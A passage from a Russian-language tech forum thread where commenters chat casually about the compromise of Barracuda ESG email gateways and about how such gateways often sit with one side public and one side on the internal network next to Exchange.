Другое дело что на практике так случается не часто :D
Ответить | Правка | Наверх | Cообщить модератору

135. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от _ (??), 14-Июн-23, 17:27 
:)
Там два порта обычно открыто до инлета Ыксчейдного - почта и директорий.

PS: О! Погодь!
Это ты к тому что у тебя баракуда и Ыксчейндж НЕ по разные стороны фаервола?!? 8-о
И так бывает? А ... Понял ... УХ! ... 8-)

Ответить | Правка | Наверх | Cообщить модератору

136. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Tron is Whistling (?), 14-Июн-23, 19:59 
У половины рогов и копыт именно так и бывает :D
Одна сторона в паблике, другая в локалке.
У меня вообще немножко по-другому, но да, случай типовой.
Ответить | Правка | Наверх | Cообщить модератору

123. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Neon (??), 13-Июн-23, 03:17 
Никогда такого не было и вот опять)))
Ответить | Правка | Наверх | Cообщить модератору

130. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Аноним (130), 13-Июн-23, 14:31 
Чего там можно сделать с ошибкой было?
Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру